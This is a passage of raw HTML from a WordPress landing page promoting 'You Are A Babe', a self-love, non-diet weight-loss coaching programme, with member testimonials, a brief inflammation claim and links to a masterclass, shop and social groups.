srcset="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?w=739&amp;ssl=1 739w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?resize=300%2C37&amp;ssl=1 300w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?resize=150%2C18&amp;ssl=1 150w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?resize=600%2C73&amp;ssl=1 600w" sizes="(max-width: 739px) 100vw, 739px" data-attachment-id="13744" data-permalink="https://beingbadass.com/you-are-a-babe-logo-jpg/" data-orig-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?fit=739%2C90&amp;ssl=1" data-orig-size="739,90" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="YOU-ARE-A-BABE-LOGO.jpg" data-image-description="" data-medium-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?fit=300%2C37&amp;ssl=1" data-large-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/02/YOU-ARE-A-BABE-LOGO-1.jpg?fit=739%2C90&amp;ssl=1" /></div></div></div><div class="elementor-element elementor-element-22e17b47 elementor-widget elementor-widget-heading" data-id="22e17b47" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">We help successful women feel like total <em>BABES!</em></h1></div></div><div class="elementor-element elementor-element-cc648a1 elementor-widget elementor-widget-heading" data-id="cc648a1" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><em>You Are A Babe</em> is an unconventional, radically self-loving, non-diet approach to weight loss, health, &amp; body confidence that <em>WORKS.</em></h1></div></div><div class="elementor-element elementor-element-46e26228 elementor-widget elementor-widget-heading" data-id="46e26228" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Want to learn how? Watch our free masterclass here:</h1></div></div><div class="elementor-element elementor-element-7c46f5c0 elementor-align-left elementor-widget elementor-widget-button" data-id="7c46f5c0" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="http://www.onlinemeetingnow.com/register/?id=mdv9ghuyx7" class="elementor-button-link elementor-button elementor-size-sm" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Watch The Free Masterclass</span> </span> </a></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-74e11888 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="74e11888" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-2d5daa6 elementor-column elementor-col-100 elementor-top-column" data-id="2d5daa6" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-a080143 elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-image" data-id="a080143" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="582" height="600" src="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" class="attachment-large size-large" alt="being-badass-you-are-a-babe-results-women" srcset="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?w=582&amp;ssl=1 582w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?resize=291%2C300&amp;ssl=1 291w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?resize=150%2C155&amp;ssl=1 150w" sizes="(max-width: 582px) 100vw, 582px" data-attachment-id="14839" data-permalink="https://beingbadass.com/home/being-badass-you-are-a-babe-results-women/" data-orig-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" data-orig-size="582,600" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="being-badass-you-are-a-babe-results-women" data-image-description="" data-medium-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=291%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2019/05/being-badass-you-are-a-babe-results-women.jpg?fit=582%2C600&amp;ssl=1" /></div></div></div><div class="elementor-element elementor-element-580a7183 elementor-widget elementor-widget-heading" data-id="580a7183" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Ready to start your self-loving transformation?</h1></div></div><section class="elementor-element elementor-element-2a5f9ef elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="2a5f9ef" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-7790a76 elementor-column elementor-col-100 elementor-inner-column" data-id="7790a76" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-fe5a194 elementor-widget elementor-widget-text-editor" data-id="fe5a194" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;"><img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> Stop dieting. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> Relax about food. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> Reduce overeating. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> End critical self-speak. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> Love how you look in photos. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" alt="❤️" /> Pleasurably shed pounds along the way.</p></div></div></div></div></div></div></div></div></section><div class="elementor-element elementor-element-df1d15f elementor-align-center elementor-widget elementor-widget-button" data-id="df1d15f" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="https://beingbadass.com/apply" class="elementor-button-link elementor-button elementor-size-sm" target="_blank" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Book Your Breakthrough Call</span> </span> </a></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-1117e62 elementor-hidden-desktop elementor-hidden-tablet elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="1117e62" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-c499663 elementor-hidden-desktop elementor-hidden-tablet elementor-column elementor-col-100 elementor-top-column" data-id="c499663" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-0fda7e2 elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-heading" data-id="0fda7e2" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><b>Join Our Free Facebook Group:</b></h1></div></div><div class="elementor-element elementor-element-5e8c29d elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-heading" data-id="5e8c29d" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Babe Syndicate: Self-Loving Weight Loss For Successful Women</h1></div></div><div class="elementor-element elementor-element-aee5a64 elementor-align-center elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-button" data-id="aee5a64" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="https://www.facebook.com/groups/beingbadass/" class="elementor-button-link elementor-button elementor-size-md" target="_blank" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Join The Facebook Group</span> </span> </a></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-04cccda elementor-section-stretched elementor-hidden-phone elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="04cccda" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-62e1de4 elementor-column elementor-col-100 elementor-top-column" data-id="62e1de4" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-0ebd35f elementor-widget elementor-widget-heading" data-id="0ebd35f" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><b>Women <img draggable="false" class="emoji" alt="❤️" src="https://s.w.org/images/core/emoji/11.2.0/svg/2764.svg" scale="0"> You Are A Babe... </b></h1></div></div><section class="elementor-element elementor-element-4284d45b elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="4284d45b" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-3ba75928 elementor-column elementor-col-100 elementor-inner-column" data-id="3ba75928" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-629397b3 elementor-hidden-desktop elementor-hidden-tablet elementor-widget elementor-widget-heading" data-id="629397b3" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Hear How A Simple Breakthrough Call Transformed Elisha’s Body Image, Weight, & Health</h1></div></div><div class="elementor-element elementor-element-4ac86ede elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="4ac86ede" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"><div class="elementor-widget-container"><div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" allowfullscreen src="https://player.vimeo.com/video/334713553?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-b566f81 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="b566f81" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-4bbd8ec elementor-column elementor-col-50 elementor-inner-column" data-id="4bbd8ec" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-901b96d elementor-widget elementor-widget-image" data-id="901b96d" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="399" height="400" src="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?fit=399%2C400&amp;ssl=1" class="attachment-large size-large" alt="" srcset="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?w=399&amp;ssl=1 399w, https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?resize=300%2C300&amp;ssl=1 300w" sizes="(max-width: 399px) 100vw, 399px" data-attachment-id="13257" data-permalink="https://beingbadass.com/bjb_cathy-jpg/" data-orig-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?fit=399%2C400&amp;ssl=1" data-orig-size="399,400" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="bjb_cathy.jpg" data-image-description="" data-medium-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/bjb_cathy.jpg?fit=399%2C400&amp;ssl=1" /></div></div></div></div></div></div><div class="elementor-element elementor-element-9a9c8a8 elementor-column elementor-col-50 elementor-inner-column" data-id="9a9c8a8" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-6cbe66c elementor-widget elementor-widget-text-editor" data-id="6cbe66c" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p><em>&#8220;<strong>I</strong> <b>lost 70 pound in 18 months and it felt effortless!</b> I wasn&#8217;t exercising yet because I ached too much that first year. And I was SICK of traditional dieting B.S.. I wanted something COMPLETELY different. <b>You Are A Babe changed my LIFE </b>and <b>I&#8217;ve kept the weight off for more than 3 years!</b>&#8220;</em> <br />&#8211; Cathy S., Current Member</p></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-ec93a7b elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="ec93a7b" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-9d644cc elementor-column elementor-col-50 elementor-inner-column" data-id="9d644cc" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-2f0f22b elementor-widget elementor-widget-image" data-id="2f0f22b" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="255" height="255" src="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?fit=255%2C255&amp;ssl=1" class="attachment-large size-large" alt="lose-4-pounds" srcset="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?w=255&amp;ssl=1 255w, https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?resize=150%2C150&amp;ssl=1 150w" sizes="(max-width: 255px) 100vw, 255px" data-attachment-id="13371" data-permalink="https://beingbadass.com/join-you-are-a-babe/lose-4-pounds/" data-orig-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?fit=255%2C255&amp;ssl=1" data-orig-size="255,255" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="lose-4-pounds" data-image-description="" data-medium-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?fit=255%2C255&amp;ssl=1" data-large-file="https://i2.wp.com/beingbadass.com/wp-content/uploads/2019/01/lose-4-pounds.png?fit=255%2C255&amp;ssl=1" /></div></div></div></div></div></div><div class="elementor-element elementor-element-66d42da elementor-column elementor-col-50 elementor-inner-column" data-id="66d42da" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-89ed3d8 elementor-widget elementor-widget-text-editor" data-id="89ed3d8" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p><em>&#8220;<strong>I lost 4 pounds my first week!</strong> And I know this is probably too soon, but <strong>I’m starting to love my body</strong>. I look at myself and I think I’m sexy. I have never thought that about myself. I owe it all to you.&#8221;</em> &#8211; Anayis. M., Member</p></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-9d89d0a elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-id="9d89d0a" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-a343b68 elementor-column elementor-col-50 elementor-inner-column" data-id="a343b68" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-d67ce5d elementor-widget elementor-widget-image" data-id="d67ce5d" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="259" height="260" src="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?fit=259%2C260&amp;ssl=1" class="attachment-large size-large" alt="" srcset="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?w=259&amp;ssl=1 259w, https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?resize=150%2C151&amp;ssl=1 150w" sizes="(max-width: 259px) 100vw, 259px" data-attachment-id="12137" data-permalink="https://beingbadass.com/home/img_3182/" data-orig-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?fit=259%2C260&amp;ssl=1" data-orig-size="259,260" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="IMG_3182" data-image-description="" data-medium-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?fit=259%2C260&amp;ssl=1" data-large-file="https://i0.wp.com/beingbadass.com/wp-content/uploads/2018/09/IMG_3182.jpg?fit=259%2C260&amp;ssl=1" /></div></div></div></div></div></div><div class="elementor-element elementor-element-020678e elementor-column elementor-col-50 elementor-inner-column" data-id="020678e" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-565ef50 elementor-widget elementor-widget-text-editor" data-id="565ef50" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p style="text-align: left;"><em >&#8220;Thanks to all the things I&#8217;m learning and implementing from Being Badass, <strong>I&#8217;m down 14 pounds!</strong>&#8220;</em>&#8211; Kelly S., Current Member</p></div></div></div></div></div></div></div></div></section></div></div></div></div></div></section><section class="elementor-element elementor-element-197cd22 elementor-hidden-phone elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="197cd22" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-493608e elementor-column elementor-col-100 elementor-top-column" data-id="493608e" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-28080fa elementor-align-center elementor-widget elementor-widget-button" data-id="28080fa" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="http://www.onlinemeetingnow.com/register/?id=mdv9ghuyx7" class="elementor-button-link elementor-button elementor-size-md" target="_blank" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Watch The Free Masterclass</span> </span> </a></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-79de2e2 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="79de2e2" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-background-overlay"></div><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-59775b8 elementor-column elementor-col-50 elementor-top-column" data-id="59775b8" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-5d26d1d7 elementor-widget elementor-widget-heading" data-id="5d26d1d7" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><b>Inflammation isn't cute. </b></h1></div></div><div class="elementor-element elementor-element-9826892 elementor-widget elementor-widget-text-editor" data-id="9826892" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p style="text-align: left;">From autoimmune issues to difficulty losing weight, inflammation is a problem for many women.</p><p style="text-align: left;">Fortunately, by simply shopping differently you can drastically reduce inflammation and improve your health and weight loss efforts. </p></div></div></div><div class="elementor-element elementor-element-72a4c6ca elementor-mobile-align-center elementor-widget elementor-widget-button" data-id="72a4c6ca" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="https://beingbadass.com/shop/" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Shop Safer Here.</span> </span> </a></div></div></div><div class="elementor-element elementor-element-7aaa64f elementor-widget elementor-widget-image" data-id="7aaa64f" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="1000" height="410" src="https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?fit=1000%2C410&amp;ssl=1" class="attachment-large size-large" alt="what inflammation does to your body" srcset="https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?w=1000&amp;ssl=1 1000w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?resize=300%2C123&amp;ssl=1 300w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?resize=768%2C315&amp;ssl=1 768w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?resize=150%2C62&amp;ssl=1 150w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?resize=600%2C246&amp;ssl=1 600w" sizes="(max-width: 1000px) 100vw, 1000px" data-attachment-id="1564" data-permalink="https://beingbadass.com/what-inflammation-means/b4_now-2/" data-orig-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?fit=1000%2C410&amp;ssl=1" data-orig-size="1000,410" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="what inflammation does to your body" data-image-description="" data-medium-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?fit=300%2C123&amp;ssl=1" data-large-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2017/07/b4_now.jpg?fit=1000%2C410&amp;ssl=1" /></div></div></div></div></div></div><div class="elementor-element elementor-element-2dede56 elementor-hidden-phone elementor-column elementor-col-50 elementor-top-column" data-id="2dede56" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-background-overlay"></div><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-2e99a287 elementor-widget elementor-widget-image" data-id="2e99a287" data-element_type="widget" data-widget_type="image.default"><div class="elementor-widget-container"><div class="elementor-image"> <img width="426" height="600" src="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?fit=426%2C600&amp;ssl=1" class="attachment-large size-large" alt="betty jean bell being badass" srcset="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?w=426&amp;ssl=1 426w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?resize=213%2C300&amp;ssl=1 213w, https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?resize=150%2C211&amp;ssl=1 150w" sizes="(max-width: 426px) 100vw, 426px" data-attachment-id="12687" data-permalink="https://beingbadass.com/blog/12-5-18_20/" data-orig-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?fit=426%2C600&amp;ssl=1" data-orig-size="426,600" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="betty jean bell being badass" data-image-description="" data-medium-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?fit=213%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/beingbadass.com/wp-content/uploads/2018/12/12-5-18_20.jpg?fit=426%2C600&amp;ssl=1" /></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-267cd0bd elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="267cd0bd" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-1c934593 elementor-column elementor-col-100 elementor-top-column" data-id="1c934593" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-6bf9c96 elementor-widget elementor-widget-heading" data-id="6bf9c96" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default"><b>Want daily self-lovin' inspiration?</b></h1></div></div><div class="elementor-element elementor-element-167c43e elementor-align-center elementor-widget elementor-widget-button" data-id="167c43e" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="https://instagram.com/beingbadass/" class="elementor-button-link elementor-button elementor-size-md" target="_blank" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Follow @BeingBadass on Instagram</span> </span> </a></div></div></div><div class="elementor-element elementor-element-a9d9a7a elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="a9d9a7a" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Or Join Our Free Facebook Group:</h1></div></div><div class="elementor-element elementor-element-9ae56bf elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="9ae56bf" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h1 class="elementor-heading-title elementor-size-default">Babe Syndicate: Self-Loving Weight Loss For Successful Women</h1></div></div><div class="elementor-element elementor-element-da66458 elementor-align-center elementor-hidden-phone elementor-widget elementor-widget-button" data-id="da66458" data-element_type="widget" data-widget_type="button.default"><div class="elementor-widget-container"><div class="elementor-button-wrapper"> <a href="https://www.facebook.com/groups/beingbadass/" class="elementor-button-link elementor-button elementor-size-md" target="_blank" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Join The Facebook Group</span> </span> </a></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-76d59f7a elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="76d59f7a" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;,&quot;stretch_section&quot;:&quot;section-stretched&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-6dd0a0f4 elementor-column elementor-col-100 elementor-top-column" data-id="6dd0a0f4" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-26d713a elementor-widget elementor-widget-heading" 